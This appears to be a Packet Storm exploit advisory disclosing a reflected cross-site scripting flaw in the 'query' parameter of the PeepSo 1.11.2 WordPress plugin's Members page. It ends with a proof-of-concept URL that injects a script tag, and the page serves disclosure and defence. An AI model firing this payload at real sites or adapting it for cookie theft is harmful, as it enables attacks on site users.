WordPress PeepSo plugin version 1.11.2 suffers from a cross site scripting vulnerability.
fd396ea5cc643099b2a7e2146c355fb3cbd14cd378133457ac2b8ff48080971a
===================================================================================
PeepSo v1.11.2 (WordPress Plugin) - Cross-Site Scripting Vulnerability in Members"
===================================================================================
____________________________________________________________________________________
# Exploit Title: PeepSo v1.11.2 (WordPress Plugin) - XSS Vulnerability in Members
# Date: [11-09-2018]
# Category: Webapps
____________________________________________________________________________________
# Author: Socket_0x03 (Alvaro J. Gene)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www.teraexe.com
____________________________________________________________________________________
# Software Link: https://wordpress.org/plugins/peepso-core/
# Plugin: PeepSo
# Version: 1.11.2
# File: Members
# Parameter: query
# Language: This application is available in English language.
# Plugin Description: PeepSo is a social network plugin for WordPress with different
kinds of features, such as user profiles, user registration, and other features.
____________________________________________________________________________________
# Cross-Site Scripting Vulnerability:
http://www.website.com/wordpress/index.php/members/?blocked/&query="><script>alert(23)</script>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed